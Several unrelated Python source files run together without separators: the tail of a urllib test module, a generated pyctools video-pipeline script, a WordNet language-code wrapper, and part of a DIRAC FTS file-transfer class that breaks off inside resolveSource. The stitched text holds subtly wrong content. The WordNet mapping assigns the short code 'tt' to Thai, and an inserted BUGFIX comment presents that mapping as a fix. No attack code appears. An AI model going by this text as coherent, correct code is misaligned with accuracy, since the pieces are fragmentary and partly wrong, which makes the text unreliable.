                         OpenerDirectorTests,
                         HandlerTests,
                         MiscTests,
                         RequestTests)

# Run the full suite (doctests + unittests) when executed directly.
if __name__ == "__main__":
    test_main(verbose=True)

#!/usr/bin/env python
# File written by pyctools-editor. Do not edit.

import argparse
import logging
from pyctools.core.compound import Compound
import pyctools.components.arithmetic
import pyctools.components.qt.qtdisplay
import pyctools.components.zone.zoneplategenerator

class Network(object):
    """Pyctools component network (machine-generated).

    Two zone-plate generators are each hard-clipped, stacked vertically and
    shown in a Qt display window.
    """
    # Component name -> class path, config (a repr'd dict string) and the
    # component's position in the pyctools-editor canvas.
    components = \
{   'clipper': {   'class': 'pyctools.components.arithmetic.Arithmetic',
                   'config': "{'func': '16+((data > 180)*219)'}",
                   'pos': (200.0, 200.0)},
    'clipper2': {   'class': 'pyctools.components.arithmetic.Arithmetic',
                    'config': "{'func': '16+((data > 230)*219)'}",
                    'pos': (200.0, 330.0)},
    'qd': {   'class': 'pyctools.components.qt.qtdisplay.QtDisplay',
              'config': "{'framerate': 60}",
              'pos': (460.0, 200.0)},
    'stacker': {   'class': 'pyctools.components.arithmetic.Arithmetic2',
                   'config': "{'func': 'numpy.vstack((data1,data2))'}",
                   'pos': (330.0, 200.0)},
    'zpg': {   'class': 'pyctools.components.zone.zoneplategenerator.ZonePlateGenerator',
               'config': "{'kx': 0.04, 'kt': -0.34, 'xlen': 600, 'ylen': "
                         "400, 'zlen': 1000, 'looping': 'repeat'}",
               'pos': (70.0, 200.0)},
    'zpg2': {   'class': 'pyctools.components.zone.zoneplategenerator.ZonePlateGenerator',
                'config': "{'kx': 0.002, 'kt': -0.017, 'xlen': 600, 'ylen': "
                          "200, 'zlen': 1000, 'looping': 'repeat'}",
                'pos': (70.0, 330.0)}}
    # (source component, output name) -> list of (target component, input name).
    linkages = \
{   ('clipper', 'output'): [('stacker', 'input1')],
    ('clipper2', 'output'): [('stacker', 'input2')],
    ('stacker', 'output'): [('qd', 'input')],
    ('zpg', 'output'): [('clipper', 'input')],
    ('zpg2', 'output'): [('clipper2', 'input')]}

    def make(self):
        """Instantiate every component and wire them into a Compound."""
        comps = {}
        for name, component in self.components.items():
            # NOTE(review): eval() of the class path and config string is
            # only safe because this file is machine-generated; never feed
            # user-supplied strings through this path.
            comps[name] = eval(component['class'])(config=eval(component['config']))
        return Compound(linkages=self.linkages, **comps)

if __name__ == '__main__':
    from PyQt5 import QtCore, QtWidgets
    # Must be set before the QApplication is created (X11 threading).
    QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_X11InitThreads)
    app = QtWidgets.QApplication([])

    # Build the network, then expose its configuration as CLI options.
    comp = Network().make()
    cnf = comp.get_config()
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    cnf.parser_add(parser)
    parser.add_argument('-v', '--verbose', action='count', default=0,
                        help='increase verbosity of log messages')
    args = parser.parse_args()
    # Each -v lowers the logging threshold by one level (10 units).
    logging.basicConfig(level=logging.ERROR - (args.verbose * 10))
    del args.verbose
    cnf.parser_set(args)
    comp.set_config(cnf)
    # Run the pipeline until the Qt event loop exits, then shut down cleanly.
    comp.start()
    app.exec_()

    comp.stop()
    comp.join()

# -*- coding: utf-8 -*-
import itertools
"""
Languages           | ShortCode     | Wordnet
Albanian            |   sq          |   als
Arabic              |   ar          |   arb
Bulgarian           |   bg          |   bul
Catalan             |   ca          |   cat
Chinese             |   zh          |   cmn
Chinese (Taiwan)    |   qn          |   qcn
Greek               |   el          |   ell
Basque              |   eu          |   eus
Persian             |   fa          |   fas
Finnish             |   fi          |   fin
French              |   fr          |   fra
Galician            |   gl          |   glg
Hebrew              |   he          |   heb
Croatian            |   hr          |   hrv
Indonesian          |   id          |   ind
Italian             |   it          |   ita
Japanese            |   ja          |   jpn
Norwegian NyNorsk   |   nn          |   nno
Norwegian Bokmål    |   nb/no       |   nob
Polish              |   pl          |   pol
Portuguese          |   pt          |   por
Slovenian           |   sl          |   slv
Spanish             |   es          |   spa
Swedish             |   sv          |   swe
Thai                |   tt          |   tha
Malay               |   ms          |   zsm
"""

"""
Language short codes => Wordnet Code
"""
AVAILABLE_LANGUAGES = {
    'sq': 'als', 'ar': 'arb', 'bg': 'bul', 'ca': 'cat', 'da': 'dan',
    'zh': 'cmn', 'el': 'ell', 'eu': 'eus', 'fa': 'fas', 'fi': 'fin',
    'fr': 'fra', 'gl': 'glg', 'he': 'heb', 'hr': 'hrv', 'id': 'ind',
    'it': 'ita', 'ja': 'jpn', 'nn': 'nno', 'nb': 'nob', 'no': 'nob',
    'pl': 'pol', 'pt': 'por', 'qn': 'qcn', 'sl': 'slv', 'es': 'spa',
    'sv': 'swe', 'tt': 'tha', 'ms': 'zsm', 'en': 'eng',
}
"""
Language names => Short Code
"""
# Lowercase language name -> language short code (a key of AVAILABLE_LANGUAGES).
# BUGFIX: 'catalan' previously mapped to the wordnet code 'cat' instead of the
# short code 'ca', and 'thai' duplicated Swedish's 'sv' instead of 'tt' — both
# made name-based lookups fail in __shortCodeToWordnetCode.
# NOTE(review): the 'france' key looks like it was meant to be 'french'; it is
# kept unchanged for backward compatibility — confirm with callers.
AVAILABLE_LANGUAGES_NAMES = {
    'albanian': 'sq', 'arabic': 'ar', 'bulgarian': 'bg', 'catalan': 'ca',
    'danish': 'da', 'chinese': 'zh', 'basque': 'eu', 'persian': 'fa',
    'finnish': 'fi', 'france': 'fr', 'galician': 'gl', 'hebrew': 'he',
    'croatian': 'hr', 'indonesian': 'id', 'italian': 'it', 'japanese': 'ja',
    'norwegian_nynorsk': 'nn', 'norwegian': 'no', 'norwegian_bokmal': 'nb',
    'polish': 'pl', 'portuguese': 'pt', 'slovenian': 'sl', 'spanish': 'es',
    'swedish': 'sv', 'thai': 'tt', 'malay': 'ms', 'english': 'en',
}


class WordnetManager(object):
    """Thin wrapper around the NLTK wordnet corpus.

    Resolves language names / short codes to Open Multilingual Wordnet
    codes and fetches lemma, hyponym and hypernym information.
    """

    def __init__(self, language="en"):
        """
        Constructor for the wordnet manager.

        :param language: main language short code (default ``"en"``).
        """
        self.__language = language

    def __isLanguageAvailable(self, code=None, language_name=None):
        """
        Check if a language is available, by short code or by name.

        :raises Exception: if neither a code nor a name is given.
        """
        if code is None and language_name is None:
            raise Exception("Error evaluating the correct language")

        if code is not None and code.lower() in AVAILABLE_LANGUAGES:
            return True
        if language_name is not None and language_name.lower() in AVAILABLE_LANGUAGES_NAMES:
            return True
        return False

    def __nameToWordnetCode(self, name):
        """
        Return the wordnet code for a given language name.

        :raises Exception: if the language name is unknown.
        """
        if not self.__isLanguageAvailable(language_name=name):
            raise Exception("Wordnet code not found for the language name %s " % name)
        languageShortCode = AVAILABLE_LANGUAGES_NAMES[name.lower()]
        # BUGFIX: this used to be called with the keyword `code=`, which is
        # not a parameter of __shortCodeToWordnetCode and raised TypeError.
        return self.__shortCodeToWordnetCode(languageShortCode)

    def __shortCodeToWordnetCode(self, shortCode):
        """
        Return the wordnet code for a given language short code.

        :raises Exception: if the short code is unknown.
        """
        if not self.__isLanguageAvailable(code=shortCode):
            raise Exception("Wordnet code not found for the language short code %s " % shortCode)
        return AVAILABLE_LANGUAGES[shortCode.lower()]

    def __getSynsets(self, word, wordNetCode):
        """Return the synsets for *word* in the language *wordNetCode*."""
        from nltk.corpus import wordnet as wn
        return wn.synsets(word, lang=wordNetCode)

    def getLemmas(self, word, languageCode="en"):
        """
        Get the lemmas for a given word.

        :param word: the word to look up.
        :param languageCode: short code of an extra language to include.
        :returns: dict mapping language short code to a sorted lemma list;
                  always contains an ``'en'`` entry.
        """
        wnCode = self.__shortCodeToWordnetCode(shortCode=languageCode)
        synsets = self.__getSynsets(word, wnCode)
        lemmas = {'en': []}
        for synset in synsets:
            lemmas['en'].extend(synset.lemma_names())
            if languageCode != "en" and self.__isLanguageAvailable(code=languageCode):
                # NOTE(review): each iteration overwrites the previous
                # synset's lemmas (original behaviour, kept intact) — only
                # the last synset's foreign lemmas are returned; confirm
                # whether accumulation was intended.
                lemmas[languageCode] = list(sorted(set(synset.lemma_names(lang=wnCode))))
        lemmas['en'] = list(sorted(set(lemmas.get('en', []))))
        return lemmas

    def getSynonyms(self, words=None, language_code="en"):
        """
        Get the synonyms for a list of words.

        :param words: list of words; ``None``/empty/non-list yields ``[]``.
        :param language_code: language short code for the lemmas.
        :returns: dict ``word -> {'lemmas': ...}``, or ``[]`` on bad input.
        """
        # BUGFIX: the original guard compared `list(words) <= 0`, which
        # raises TypeError on Python 3; it also used a mutable [] default.
        if words is None or not isinstance(words, list) or not words:
            return []

        if not self.__isLanguageAvailable(code=language_code):
            return []

        result = {}
        for word in words:
            result[word] = {'lemmas': self.getLemmas(word, languageCode=language_code)}
        return result

    def __relatedLemmas(self, words, language_code, relation):
        """Shared implementation for getHyponyms/getHypernyms.

        :param relation: synset method name, ``'hyponyms'`` or ``'hypernyms'``.
        """
        wnCode = self.__shortCodeToWordnetCode(language_code)
        result = {}
        for word in words:
            synsets = self.__getSynsets(word, wnCode)
            related = [rel for synset in synsets
                       for rel in getattr(synset, relation)()]
            engLemmas = [syn.lemma_names() for syn in related]
            lemmas = {'en': list(sorted(set(itertools.chain.from_iterable(engLemmas)),
                                        key=lambda s: s.lower()))}
            if language_code != "en":
                languageLemmas = [syn.lemma_names(lang=wnCode) for syn in related]
                lemmas[language_code] = list(
                    sorted(set(itertools.chain.from_iterable(languageLemmas)),
                           key=lambda s: s.lower()))
            result[word] = {'lemmas': lemmas, 'language': language_code}
        return result

    def getHyponyms(self, words, language_code="en"):
        """
        Get more specific synsets (hyponyms) for the given words.
        """
        return self.__relatedLemmas(words, language_code, 'hyponyms')

    def getHypernyms(self, words, language_code="en"):
        """
        Get more general synsets (hypernyms) for the given words.
        """
        return self.__relatedLemmas(words, language_code, 'hypernyms')

#############################################################################
# $HeadURL$
#############################################################################
""" ..mod: FTSRequest
    =================

    Helper class to perform FTS job submission and monitoring.

"""
# # imports
import sys
import re
import time
# # from DIRAC
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.File import checkGuid
from DIRAC.Core.Utilities.Adler import compareAdler, intAdlerToHex, hexAdlerToInt
from DIRAC.Core.Utilities.SiteSEMapping import getSitesForSE
from DIRAC.Core.Utilities.Time import dateTime
from DIRAC.Resources.Storage.StorageElement import StorageElement
from DIRAC.Resources.Catalog.FileCatalog    import FileCatalog
from DIRAC.Core.Utilities.ReturnValues import returnSingleResult

from DIRAC.AccountingSystem.Client.Types.DataOperation import DataOperation
from DIRAC.ConfigurationSystem.Client.Helpers.Resources import Resources
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations

from DIRAC.DataManagementSystem.Client.FTSJob import FTSJob
from DIRAC.DataManagementSystem.Client.FTSFile import FTSFile

# # RCSID
__RCSID__ = "$Id$"

class FTSRequest( object ):
  """
  .. class:: FTSRequest

  Helper class for FTS job submission and monitoring.
  """

  # # default checksum type
  __defaultCksmType = "ADLER32"
  # # flag to disable/enable checksum test, default: disabled
  __cksmTest = False

  def __init__( self ):
    """c'tor

    Initialises all bookkeeping state for one FTS transfer request:
    state tuples, the per-LFN file dictionary, SE/token placeholders
    and the checksum settings.

    :param self: self reference
    """
    self.log = gLogger.getSubLogger( self.__class__.__name__, True )

    # # final states tuple
    self.finalStates = ( 'Canceled', 'Failed', 'Hold',
                         'Finished', 'FinishedDirty' )
    # # failed states tuple
    self.failedStates = ( 'Canceled', 'Failed',
                          'Hold', 'FinishedDirty' )
    # # successful states tuple
    self.successfulStates = ( 'Finished', 'Done' )
    # # all file states tuple
    self.fileStates = ( 'Done', 'Active', 'Pending', 'Ready', 'Canceled', 'Failed',
                        'Finishing', 'Finished', 'Submitted', 'Hold', 'Waiting' )

    self.statusSummary = {}

    # # request status
    self.requestStatus = 'Unknown'

    # # dict for FTS job files: LFN -> { 'Status', 'Source', 'Target', ... }
    self.fileDict = {}
    # # dict for replicas information
    self.catalogReplicas = {}
    # # dict for metadata information
    self.catalogMetadata = {}
    # # dict for files that failed to register
    self.failedRegistrations = {}

    # # placeholder for FileCatalog reference
    self.oCatalog = None

    # # submit timestamp
    self.submitTime = ''

    # # placeholder FTS job GUID
    self.ftsGUID = ''
    # # placeholder for FTS server URL
    self.ftsServer = ''

    # # flag marking FTS job completeness
    self.isTerminal = False
    # # completeness percentage
    self.percentageComplete = 0.0

    # # source SE name
    self.sourceSE = ''
    # # flag marking source SE validity
    self.sourceValid = False
    # # source space token
    self.sourceToken = ''

    # # target SE name
    self.targetSE = ''
    # # flag marking target SE validity
    self.targetValid = False
    # # target space token
    self.targetToken = ''

    # # placeholder for target StorageElement
    self.oTargetSE = None
    # # placeholder for source StorageElement
    self.oSourceSE = None

    # # checksum type, set it to default
    self.__cksmType = self.__defaultCksmType
    # # disable checksum test by default
    self.__cksmTest = False

    # # statuses that prevent submitting to FTS
    self.noSubmitStatus = ( 'Failed', 'Done', 'Staging' )

    # # were sources resolved?
    self.sourceResolved = False

    # # Number of file transfers actually submitted
    self.submittedFiles = 0
    self.transferTime = 0

    # # CLI commands used for FTS2 submission/monitoring, from Operations CS
    self.submitCommand = Operations().getValue( 'DataManagement/FTSPlacement/FTS2/SubmitCommand', 'glite-transfer-submit' )
    self.monitorCommand = Operations().getValue( 'DataManagement/FTSPlacement/FTS2/MonitorCommand', 'glite-transfer-status' )
    self.ftsJob = None
    self.ftsFiles = []

  ####################################################################
  #
  #  Methods for setting/getting/checking the SEs
  #

  def setSourceSE( self, se ):
    """ Set and validate the source SE.

    :param self: self reference
    :param str se: source SE name
    """
    # source and target must differ
    if se == self.targetSE:
      return S_ERROR( "SourceSE is TargetSE" )
    self.sourceSE = se
    self.oSourceSE = StorageElement( se )
    return self.__checkSourceSE()

  def __checkSourceSE( self ):
    """ check source SE availability

    Validates that the source SE is set, readable and exposes an SRM space
    token; optionally verifies its checksum type when the checksum test is
    enabled.

    :param self: self reference
    :return: S_OK() on success, S_ERROR otherwise
    """
    if not self.sourceSE:
      return S_ERROR( "SourceSE not set" )
    res = self.oSourceSE.isValid( 'Read' )
    if not res['OK']:
      return S_ERROR( "SourceSE not available for reading" )
    res = self.__getSESpaceToken( self.oSourceSE )
    if not res['OK']:
      self.log.error( "FTSRequest failed to get SRM Space Token for SourceSE", res['Message'] )
      return S_ERROR( "SourceSE does not support FTS transfers" )

    if self.__cksmTest:
      # BUGFIX: the checksum-type comparison used to sit inside the error
      # branch, reading res["Value"] from a failed result and never running
      # on success; it also clobbered `res`, corrupting sourceToken below.
      cksmRes = self.oSourceSE.getChecksumType()
      if not cksmRes["OK"]:
        self.log.error( "Unable to get checksum type for SourceSE", 
                        "%s: %s" % ( self.sourceSE, cksmRes["Message"] ) )
      else:
        cksmType = cksmRes["Value"]
        if cksmType in ( "NONE", "NULL" ):
          self.log.warn( "Checksum type set to %s at SourceSE %s, disabling checksum test" % ( cksmType,
                                                                                              self.sourceSE ) )
          self.__cksmTest = False
        elif cksmType != self.__cksmType:
          self.log.warn( "Checksum type mismatch, disabling checksum test" )
          self.__cksmTest = False

    self.sourceToken = res['Value']
    self.sourceValid = True
    return S_OK()

  def setTargetSE( self, se ):
    """ Set and validate the target SE.

    :param self: self reference
    :param str se: target SE name
    """
    # target and source must differ
    if se == self.sourceSE:
      return S_ERROR( "TargetSE is SourceSE" )
    self.targetSE = se
    self.oTargetSE = StorageElement( se )
    return self.__checkTargetSE()

  def setTargetToken( self, token ):
    """ Record the target space token.

    :param self: self reference
    :param str token: target space token
    """
    self.targetToken = token
    return S_OK()

  def __checkTargetSE( self ):
    """ check target SE availability

    Validates that the target SE is set, writable and exposes an SRM space
    token; optionally verifies its checksum type when the checksum test is
    enabled.

    :param self: self reference
    :return: S_OK() on success, S_ERROR otherwise
    """
    if not self.targetSE:
      return S_ERROR( "TargetSE not set" )
    res = self.oTargetSE.isValid( 'Write' )
    if not res['OK']:
      return S_ERROR( "TargetSE not available for writing" )
    res = self.__getSESpaceToken( self.oTargetSE )
    if not res['OK']:
      self.log.error( "FTSRequest failed to get SRM Space Token for TargetSE", res['Message'] )
      return S_ERROR( "TargetSE does not support FTS transfers" )

    # # check checksum types
    if self.__cksmTest:
      # BUGFIX: the checksum-type comparison used to sit inside the error
      # branch, reading res["Value"] from a failed result and never running
      # on success; it also clobbered `res`, corrupting targetToken below.
      cksmRes = self.oTargetSE.getChecksumType()
      if not cksmRes["OK"]:
        self.log.error( "Unable to get checksum type for TargetSE", 
                        "%s: %s" % ( self.targetSE, cksmRes["Message"] ) )
      else:
        cksmType = cksmRes["Value"]
        if cksmType in ( "NONE", "NULL" ):
          self.log.warn( "Checksum type set to %s at TargetSE %s, disabling checksum test" % ( cksmType,
                                                                                              self.targetSE ) )
          self.__cksmTest = False
        elif cksmType != self.__cksmType:
          self.log.warn( "Checksum type mismatch, disabling checksum test" )
          self.__cksmTest = False

    self.targetToken = res['Value']
    self.targetValid = True
    return S_OK()

  @staticmethod
  def __getSESpaceToken( oSE ):
    """ Fetch the SRM space token from a StorageElement instance.

    :param StorageElement oSE: StorageElement instance
    :return: S_OK( token or None ), or the error from getStorageParameters
    """
    res = oSE.getStorageParameters( "SRM2" )
    if res['OK']:
      return S_OK( res['Value'].get( 'SpaceToken' ) )
    return res

  ####################################################################
  #
  #  Methods for setting/getting FTS request parameters
  #

  def setFTSGUID( self, guid ):
    """ Set the FTS job GUID after validating its format.

    :param self: self reference
    :param str guid: string containing GUID
    """
    if checkGuid( guid ):
      self.ftsGUID = guid
      return S_OK()
    return S_ERROR( "Incorrect GUID format" )


  def setFTSServer( self, server ):
    """ Record the FTS server URL to use.

    :param self: self reference
    :param str server: FTS server URL
    """
    self.ftsServer = server
    return S_OK()

  def isRequestTerminal( self ):
    """ Check whether the FTS job has reached a final state.

    :param self: self reference
    :return: S_OK( bool )
    """
    # once terminal, stays terminal
    self.isTerminal = self.isTerminal or ( self.requestStatus in self.finalStates )
    return S_OK( self.isTerminal )

  def setCksmTest( self, cksmTest = False ):
    """ Enable or disable the checksum test.

    :param self: self reference
    :param bool cksmTest: flag to enable/disable checksum test
    :return: S_OK( bool ) with the stored flag
    """
    self.__cksmTest = True if cksmTest else False
    return S_OK( self.__cksmTest )

  ####################################################################
  #
  #  Methods for setting/getting/checking files and their metadata
  #

  def setLFN( self, lfn ):
    """ Register LFN :lfn: in :fileDict: with a default 'Waiting' status.

    :param self: self reference
    :param str lfn: LFN to add
    """
    if lfn not in self.fileDict:
      self.fileDict[lfn] = { 'Status' : 'Waiting' }
    return S_OK()

  def setSourceSURL( self, lfn, surl ):
    """ Set the source SURL for :lfn:, refusing a SURL equal to the target.

    :param self: self reference
    :param str lfn: LFN
    :param str surl: source SURL
    """
    if surl == self.fileDict[lfn].get( 'Target' ):
      return S_ERROR( "Source and target the same" )
    return self.__setFileParameter( lfn, 'Source', surl )

  def getSourceSURL( self, lfn ):
    """ Return the source SURL recorded for :lfn:.

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Source' )

  def setTargetSURL( self, lfn, surl ):
    """ Set the target SURL for :lfn:, refusing a SURL equal to the source.

    :param self: self reference
    :param str lfn: LFN
    :param str surl: target SURL
    """
    if surl == self.fileDict[lfn].get( 'Source' ):
      return S_ERROR( "Source and target the same" )
    return self.__setFileParameter( lfn, 'Target', surl )

  def getFailReason( self, lfn ):
    """ Return the failure reason recorded for file :lfn:.

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Reason' )

  def getRetries( self, lfn ):
    """ Return the number of transfer attempts made for file :lfn:.

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Retries' )

  def getTransferTime( self, lfn ):
    """ Return the transfer duration recorded for file :lfn:.

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Duration' )

  def getFailed( self ):
    """ Return S_OK with the LFNs whose status is one of the failed states.

    :param self: self reference
    """
    failed = [ lfn for lfn, info in self.fileDict.items()
               if info.get( 'Status', '' ) in self.failedStates ]
    return S_OK( failed )

  def getStaging( self ):
    """ Return S_OK with the LFNs currently set for prestaging. """
    staging = [ lfn for lfn, info in self.fileDict.items()
                if info.get( 'Status', '' ) == 'Staging' ]
    return S_OK( staging )

  def getDone( self ):
    """ Return the LFNs whose transfer ended in one of the successful states.

    :param self: self reference
    :return: S_OK( list of LFNs )
    """
    done = []
    for lfn, fileInfo in self.fileDict.items():
      if fileInfo.get( 'Status', '' ) in self.successfulStates:
        done.append( lfn )
    return S_OK( done )

  def __setFileParameter( self, lfn, paramName, paramValue ):
    """ set :paramName: to :paramValue: for :lfn: file

    Creates the file entry first (via setLFN) if it is not tracked yet.

    :param self: self reference
    :param str lfn: LFN
    :param str paramName: parameter name
    :param mixed paramValue: a new parameter value
    """
    self.setLFN( lfn )
    self.fileDict[lfn][paramName] = paramValue
    return S_OK()

  def __getFileParameter( self, lfn, paramName ):
    """ Fetch the value of :paramName: recorded for file :lfn:.

    :param self: self reference
    :param str lfn: LFN
    :param str paramName: parameter name
    :return: S_OK( value ), or S_ERROR when the file or the parameter is unknown
    """
    if lfn not in self.fileDict:
      return S_ERROR( "Supplied file not set" )
    fileInfo = self.fileDict[lfn]
    if paramName not in fileInfo:
      return S_ERROR( "%s not set for file" % paramName )
    return S_OK( fileInfo[paramName] )

  ####################################################################
  #
  #  Methods for submission
  #

  def submit( self, monitor = False, printOutput = True ):
    """ submit FTS job

    :param self: self reference
    :param bool monitor: flag to monitor progress of FTS job
    :param bool printOutput: flag to print output of execution to stdout
    :return: S_OK( { 'ftsGUID', 'ftsServer', 'submittedFiles' } ) or S_ERROR
    """
    res = self.__prepareForSubmission()
    if not res['OK']:
      return res
    res = self.__submitFTSTransfer()
    if not res['OK']:
      return res
    resDict = { 'ftsGUID' : self.ftsGUID, 'ftsServer' : self.ftsServer, 'submittedFiles' : self.submittedFiles }
    if monitor or printOutput:
      gLogger.always( "Submitted %s@%s" % ( self.ftsGUID, self.ftsServer ) )
      if monitor:
        # blocks until the job reaches a terminal state
        self.monitor( untilTerminal = True, printOutput = printOutput, full = False )
    return S_OK( resDict )

  def __prepareForSubmission( self ):
    """ check validity of job before submission

    :param self: self reference
    :return: S_OK() when the job has files, valid SEs, an FTS server and at
             least one submittable file; S_ERROR otherwise
    """
    if not self.fileDict:
      return S_ERROR( "No files set" )
    if not self.sourceValid:
      return S_ERROR( "SourceSE not valid" )
    if not self.targetValid:
      return S_ERROR( "TargetSE not valid" )
    if not self.ftsServer:
      res = self.__resolveFTSServer()
      if not res['OK']:
        return S_ERROR( "FTSServer not valid" )
    # NOTE(review): the return values of resolveSource/resolveTarget are
    # ignored here; per-file failures surface through __filesToSubmit below.
    self.resolveSource()
    self.resolveTarget()
    res = self.__filesToSubmit()
    if not res['OK']:
      return S_ERROR( "No files to submit" )
    return S_OK()

  def __getCatalogObject( self ):
    """ CatalogInterface instance facade

    Lazily instantiates the FileCatalog on first use and caches it.

    :param self: self reference
    :return: S_OK() or S_ERROR with the instantiation error
    """
    try:
      if not self.oCatalog:
        self.oCatalog = FileCatalog()
      return S_OK()
    except Exception as error:
      # Was a bare "except:" returning an empty S_ERROR(): it swallowed even
      # SystemExit/KeyboardInterrupt and hid the failure reason.
      return S_ERROR( "Failed to instantiate FileCatalog: %s" % error )

  def __updateReplicaCache( self, lfns = None, overwrite = False ):
    """ Refresh the catalog replica cache for :lfns:.

    Files whose replica lookup fails are flagged 'Failed' with a reason.

    :param self: self reference
    :param mixed lfns: list of LFNs (defaults to every tracked file)
    :param bool overwrite: re-fetch replicas even when already cached
    """
    lfns = lfns or self.fileDict.keys()
    toUpdate = [ lfn for lfn in lfns if overwrite or ( lfn not in self.catalogReplicas ) ]
    if not toUpdate:
      return S_OK()
    res = self.__getCatalogObject()
    if not res['OK']:
      return res
    res = self.oCatalog.getReplicas( toUpdate )
    if not res['OK']:
      return S_ERROR( "Failed to update replica cache: %s" % res['Message'] )
    for lfn, error in res['Value']['Failed'].items():
      self.__setFileParameter( lfn, 'Reason', error )
      self.__setFileParameter( lfn, 'Status', 'Failed' )
    self.catalogReplicas.update( res['Value']['Successful'] )
    return S_OK()

  def __updateMetadataCache( self, lfns = None ):
    """ Refresh the catalog metadata cache for :lfns:.

    Files whose metadata lookup fails are flagged 'Failed' with a reason.

    :param self: self reference
    :param list lfns: list of LFNs (defaults to every tracked file)
    """
    lfns = lfns or self.fileDict.keys()
    toUpdate = [ lfn for lfn in lfns if lfn not in self.catalogMetadata ]
    if not toUpdate:
      return S_OK()
    res = self.__getCatalogObject()
    if not res['OK']:
      return res
    res = self.oCatalog.getFileMetadata( toUpdate )
    if not res['OK']:
      return S_ERROR( "Failed to get source catalog metadata: %s" % res['Message'] )
    for lfn, error in res['Value']['Failed'].items():
      self.__setFileParameter( lfn, 'Reason', error )
      self.__setFileParameter( lfn, 'Status', 'Failed' )
    self.catalogMetadata.update( res['Value']['Successful'] )
    return S_OK()

  def resolveSource( self ):
    """ resolve source SE eligible for submission

    Refreshes metadata/replica caches, computes a source SURL for every file
    that still needs a transfer, then checks the physical source files for
    existence, availability, caching state, size and checksum.  Files failing
    any check are flagged 'Failed' with a 'Reason'; files not on disk are
    sent for prestaging and flagged 'Staging'.

    :param self: self reference
    """

    # Avoid resolving sources twice
    if self.sourceResolved:
      return S_OK()
    # Only resolve files that need a transfer
    toResolve = [ lfn for lfn in self.fileDict if self.fileDict[lfn].get( "Status", "" ) != "Failed" ]
    if not toResolve:
      return S_OK()
    res = self.__updateMetadataCache( toResolve )
    if not res['OK']:
      return res
    res = self.__updateReplicaCache( toResolve )
    if not res['OK']:
      return res

    # Define the source URLs
    for lfn in toResolve:
      replicas = self.catalogReplicas.get( lfn, {} )
      if self.sourceSE not in replicas:
        gLogger.warn( "resolveSource: skipping %s - not replicas at SourceSE %s" % ( lfn, self.sourceSE ) )
        self.__setFileParameter( lfn, 'Reason', "No replica at SourceSE" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue

      res = returnSingleResult( self.oSourceSE.getURL( lfn, protocol = 'srm' ) )
      if not res['OK']:
        gLogger.warn( "resolveSource: skipping %s - %s" % ( lfn, res["Message"] ) )
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue
      res = self.setSourceSURL( lfn, res['Value'] )
      if not res['OK']:
        gLogger.warn( "resolveSource: skipping %s - %s" % ( lfn, res["Message"] ) )
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue

    # Keep only the files that actually got a source SURL
    toResolve = []
    for lfn in self.fileDict:
      if "Source" in self.fileDict[lfn]:
        toResolve.append( lfn )
    if not toResolve:
      return S_ERROR( "No eligible Source files" )

    # Get metadata of the sources, to check for existance, availability and caching
    res = self.oSourceSE.getFileMetadata( toResolve )
    if not res['OK']:
      return S_ERROR( "Failed to check source file metadata" )

    for lfn, error in res['Value']['Failed'].items():
      if re.search( 'File does not exist', error ):
        gLogger.warn( "resolveSource: skipping %s - source file does not exists" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source file does not exist" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      else:
        gLogger.warn( "resolveSource: skipping %s - failed to get source metadata" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Failed to get Source metadata" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
    toStage = []

    nbStagedFiles = 0
    for lfn, metadata in res['Value']['Successful'].items():
      lfnStatus = self.fileDict.get( lfn, {} ).get( 'Status' )
      if metadata['Unavailable']:
        gLogger.warn( "resolveSource: skipping %s - source file unavailable" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source file Unavailable" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif metadata['Lost']:
        gLogger.warn( "resolveSource: skipping %s - source file lost" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source file Lost" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif not metadata['Cached']:
        # not on disk yet: schedule for prestaging unless already requested
        if lfnStatus != 'Staging':
          toStage.append( lfn )
      elif metadata['Size'] != self.catalogMetadata[lfn]['Size']:
        gLogger.warn( "resolveSource: skipping %s - source file size mismatch" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source size mismatch" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif self.catalogMetadata[lfn]['Checksum'] and metadata['Checksum'] and \
            not compareAdler( metadata['Checksum'], self.catalogMetadata[lfn]['Checksum'] ):
        gLogger.warn( "resolveSource: skipping %s - source file checksum mismatch" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source checksum mismatch" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif lfnStatus == 'Staging':
        # file that was staging is now cached
        self.__setFileParameter( lfn, 'Status', 'Waiting' )
        nbStagedFiles += 1

    # Some files were being staged
    if nbStagedFiles:
      self.log.info( 'resolveSource: %d files have been staged' % nbStagedFiles )

    # Launching staging of files not in cache
    if toStage:
      gLogger.warn( "resolveSource: %s source files not cached, prestaging..." % len( toStage ) )
      stage = self.oSourceSE.prestageFile( toStage )
      if not stage["OK"]:
        gLogger.error( "resolveSource: error is prestaging", stage["Message"] )
        for lfn in toStage:
          self.__setFileParameter( lfn, 'Reason', stage["Message"] )
          self.__setFileParameter( lfn, 'Status', 'Failed' )
      else:
        for lfn in toStage:
          if lfn in stage['Value']['Successful']:
            self.__setFileParameter( lfn, 'Status', 'Staging' )
          elif lfn in stage['Value']['Failed']:
            self.__setFileParameter( lfn, 'Reason', stage['Value']['Failed'][lfn] )
